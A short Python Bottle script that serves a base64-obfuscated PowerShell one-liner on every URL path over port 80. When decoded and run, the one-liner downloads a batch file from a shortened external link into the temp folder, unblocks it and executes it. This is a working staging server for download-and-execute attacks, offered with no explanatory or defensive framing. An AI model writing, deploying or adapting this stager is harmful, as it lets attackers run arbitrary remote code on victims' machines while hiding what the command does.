# -*- coding:utf-8 -*-

from bottle import *


@route('/<n:path>',method=["POST","GET"])
def powershell(n):
    ps="""Invoke-Expression ([System.Text.UnicodeEncoding]::Unicode.GetString([Convert]::FromBase64String("JABzAHIAYwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBkAHcAegAuAGMAbgAvAGUANABlADIATgBjAHMAbgAnADsAJABkAGUAcwAgAD0AIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAcgBlAG0AbwB2AGUAXwByAGEAbgBkAG8AbQAuAGIAYQB0ACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzA
HQAIAAtAHUAcgBpACAAJABzAHIAYwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZABlAHMAOwBVAG4AYgBsAG8AYwBrAC0ARgBpAGwAZQAgACQAZABlAHMAOwBpAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAcgBlAG0Abw
B2AGUAXwByAGEAbgBkAG8AbQAuAGIAYQB0ACIAOwA=")))"""
    return ps;

@route('/')
def powershell1():
    ps="""Invoke-Expression ([System.Text.UnicodeEncoding]::Unicode.GetString([Convert]::FromBase64String("JABzAHIAYwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBkAHcAegAuAGMAbgAvAGUANABlADIATgBjAHMAbgAnADsAJABkAGUAcwAgAD0AIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAcgBlAG0AbwB2AGUAXwByAGEAbgBkAG8AbQAuAGIAYQB0ACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzA
HQAIAAtAHUAcgBpACAAJABzAHIAYwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZABlAHMAOwBVAG4AYgBsAG8AYwBrAC0ARgBpAGwAZQAgACQAZABlAHMAOwBpAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAcgBlAG0Abw
B2AGUAXwByAGEAbgBkAG8AbQAuAGIAYQB0ACIAOwA=")))"""
    return ps;

if __name__ == '__main__':
    run(host='0.0.0.0',port=80)
